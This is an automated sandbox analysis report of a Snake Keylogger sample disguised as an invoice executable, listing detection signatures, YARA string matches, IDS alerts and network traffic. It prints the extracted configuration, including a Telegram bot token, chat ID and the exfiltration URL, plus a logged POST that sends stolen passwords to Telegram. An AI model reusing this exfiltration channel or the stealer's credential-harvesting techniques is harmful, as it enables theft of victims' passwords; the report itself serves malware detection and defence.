
Windows Analysis Report
invoice packing list.exe

Overview

General Information

Sample name: invoice packing list.exe
Analysis ID: 1618382
MD5: 20a391888281aae1523bcf182c1cb4e9
SHA1: 587eea4c6fc96e91f316c60f31710071764440fa
SHA256: 16ac39458488454a5d43d2f0d250fe014bf22ab1542ee6cbd10c6f69ab8d91d8
Tags: exe, user-abuse_ch

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w10x64
  • invoice packing list.exe (PID: 3008 cmdline: "C:\Users\user\Desktop\invoice packing list.exe" MD5: 20A391888281AAE1523BCF182C1CB4E9)
    • invoice packing list.exe (PID: 6180 cmdline: "C:\Users\user\Desktop\invoice packing list.exe" MD5: 20A391888281AAE1523BCF182C1CB4E9)
    • invoice packing list.exe (PID: 6396 cmdline: "C:\Users\user\Desktop\invoice packing list.exe" MD5: 20A391888281AAE1523BCF182C1CB4E9)
    • invoice packing list.exe (PID: 3716 cmdline: "C:\Users\user\Desktop\invoice packing list.exe" MD5: 20A391888281AAE1523BCF182C1CB4E9)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage?chat_id=7207594974", "Token": "7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s", "Chat_id": "7207594974", "Version": "5.1"}
Source | Rule | Description | Author | Strings
  • Source: 00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
  • Source: 00000005.00000002.4490656225.0000000003199000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
  • Source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
  • Source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
    • 0x3351f:$a1: get_encryptedPassword
    • 0x33803:$a2: get_encryptedUsername
    • 0x3332b:$a3: get_timePasswordChanged
    • 0x33426:$a4: get_passwordField
    • 0x33535:$a5: set_encryptedPassword
    • 0x34b6d:$a7: get_logins
    • 0x34ad0:$a10: KeyLoggerEventArgs
    • 0x3473b:$a11: KeyLoggerEventArgsEventHandler
  • Source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp | Rule: MALWARE_Win_SnakeKeylogger | Description: Detects Snake Keylogger | Author: ditekSHen
    • 0x384ea:$x1: $%SMTPDV$
    • 0x36ebc:$x2: $#TheHashHere%&
    • 0x38492:$x3: %FTPDV$
    • 0x36e5c:$x4: $%TelegramDv$
    • 0x3473b:$x5: KeyLoggerEventArgs
    • 0x34ad0:$x5: KeyLoggerEventArgs
    • 0x384b6:$m2: Clipboard Logs ID
    • 0x386f4:$m2: Screenshot Logs ID
    • 0x38804:$m2: keystroke Logs ID
    • 0x38ade:$m3: SnakePW
    • 0x386cc:$m4: \SnakeKeylogger\
  16 entries in total; the remaining entries are not shown here.
Source | Rule | Description | Author | Strings
  • Source: 5.2.invoice packing list.exe.400000.0.unpack | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
  • Source: 5.2.invoice packing list.exe.400000.0.unpack | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
    • 0x14497:$a1: get_encryptedPassword
    • 0x1477b:$a2: get_encryptedUsername
    • 0x142a3:$a3: get_timePasswordChanged
    • 0x1439e:$a4: get_passwordField
    • 0x144ad:$a5: set_encryptedPassword
    • 0x15ae5:$a7: get_logins
    • 0x15a48:$a10: KeyLoggerEventArgs
    • 0x156b3:$a11: KeyLoggerEventArgsEventHandler
  • Source: 5.2.invoice packing list.exe.400000.0.unpack | Rule: MAL_Envrial_Jan18_1 | Description: Detects Encrial credential stealer malware | Author: Florian Roth
    • 0x1be50:$a2: \Comodo\Dragon\User Data\Default\Login Data
    • 0x1b082:$a3: \Google\Chrome\User Data\Default\Login Data
    • 0x1b4b5:$a4: \Orbitum\User Data\Default\Login Data
    • 0x1c4f4:$a5: \Kometa\User Data\Default\Login Data
  • Source: 5.2.invoice packing list.exe.400000.0.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Description: Detects executables with potential process hoocking | Author: ditekSHen
    • 0x1503a:$s1: UnHook
    • 0x15041:$s2: SetHook
    • 0x15049:$s3: CallNextHook
    • 0x15056:$s4: _hook
  • Source: 5.2.invoice packing list.exe.400000.0.unpack | Rule: MALWARE_Win_SnakeKeylogger | Description: Detects Snake Keylogger | Author: ditekSHen
    • 0x19462:$x1: $%SMTPDV$
    • 0x17e34:$x2: $#TheHashHere%&
    • 0x1940a:$x3: %FTPDV$
    • 0x17dd4:$x4: $%TelegramDv$
    • 0x156b3:$x5: KeyLoggerEventArgs
    • 0x15a48:$x5: KeyLoggerEventArgs
    • 0x1942e:$m2: Clipboard Logs ID
    • 0x1966c:$m2: Screenshot Logs ID
    • 0x1977c:$m2: keystroke Logs ID
    • 0x19a56:$m3: SnakePW
    • 0x19644:$m4: \SnakeKeylogger\
  29 entries in total; the remaining entries are not shown here.
          No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-18T20:22:49.306309+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 104.21.16.1 | 443 | TCP
2025-02-18T20:22:50.565337+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49711 | 104.21.16.1 | 443 | TCP
2025-02-18T20:22:51.870358+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49714 | 104.21.16.1 | 443 | TCP
2025-02-18T20:22:53.237725+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49717 | 104.21.16.1 | 443 | TCP
2025-02-18T20:22:55.789667+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49721 | 104.21.16.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-18T20:22:47.297829+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49706 | 193.122.6.168 | 80 | TCP
2025-02-18T20:22:48.453996+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49706 | 193.122.6.168 | 80 | TCP
2025-02-18T20:22:50.001024+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49710 | 193.122.6.168 | 80 | TCP
2025-02-18T20:22:51.250868+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49713 | 193.122.6.168 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-18T20:23:03.218300+0100 | 2853006 | 1 | A Network Trojan was detected | 192.168.2.5 | 49725 | 149.154.167.220 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-18T20:23:03.043523+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49725 | 149.154.167.220 | 443 | TCP

AV Detection

Source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage?chat_id=7207594974", "Token": "7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s", "Chat_id": "7207594974", "Version": "5.1"}
Source: invoice packing list.exe.3716.5.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage"}
Source: invoice packing list.exe | ReversingLabs: Detection: 59%
Source: invoice packing list.exe | Virustotal: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack | String decryptor:
Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack | String decryptor: 7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s
Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack | String decryptor: 7207594974

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: invoice packing list.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49707 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: invoice packing list.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: IhJW.pdb | source: invoice packing list.exe
Source: Binary string: IhJW.pdbSHA256N | source: invoice packing list.exe
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then mov eax, dword ptr [ebp-54h] | 0_2_02703E0C
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 0148F1F6h | 5_2_0148F007
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 0148FB80h | 5_2_0148F007
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 5_2_0148E528
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC7C4Dh | 5_2_06BC7910
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC6A59h | 5_2_06BC67B0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC4A91h | 5_2_06BC47E8
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC7761h | 5_2_06BC74B8
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC0741h | 5_2_06BC0498
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC5799h | 5_2_06BC54F0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC6EB1h | 5_2_06BC6C08
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC4EE9h | 5_2_06BC4C40
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC6049h | 5_2_06BC5DA0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC0FF1h | 5_2_06BC0D48
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC64CBh | 5_2_06BC6220
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC4611h | 5_2_06BC4368
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC5341h | 5_2_06BC5098
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC0B99h | 5_2_06BC08F0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC7309h | 5_2_06BC7060
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC02E9h | 5_2_06BC0040
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 4x nop then jmp 06BC5BF1h | 5_2_06BC5948

Networking

Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49725 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49725 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendDocument?chat_id=7207594974&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd50c266b4e61c | Host: api.telegram.org | Content-Length: 570 | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.16.1
Source: Joe Sandbox View | IP Address: 104.21.16.1
Source: Joe Sandbox View | IP Address: 193.122.6.168
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49713 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49721 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 104.21.16.1:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49707 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendDocument?chat_id=7207594974&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd50c266b4e61c | Host: api.telegram.org | Content-Length: 570 | Connection: Keep-Alive
Source: invoice packing list.exe, 00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000003134000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000314F000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000318B000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003094000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003127000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000317C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000003134000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000314F000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000318B000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003094000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003127000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000317C000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000315D000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.00000000030D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: invoice packing list.exe, 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000003134000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000314F000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000318B000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003127000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000317C000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.00000000030AC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: invoice packing list.exe, 00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: invoice packing list.exe, 00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: invoice packing list.exe, 00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendDocument?chat_id=7207
Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000003134000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000314F000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000318B000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003094000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003127000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000317C000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.00000000030D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: invoice packing list.exe, 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003094000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: invoice packing list.exe, 00000005.00000002.4490656225.00000000030D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000003134000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000314F000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000318B000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003127000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000317C000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.00000000030D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49725 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: invoice packing list.exe, HookManager.cs | .Net Code: EnsureSubscribedToGlobalKeyboardEvents

System Summary

Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
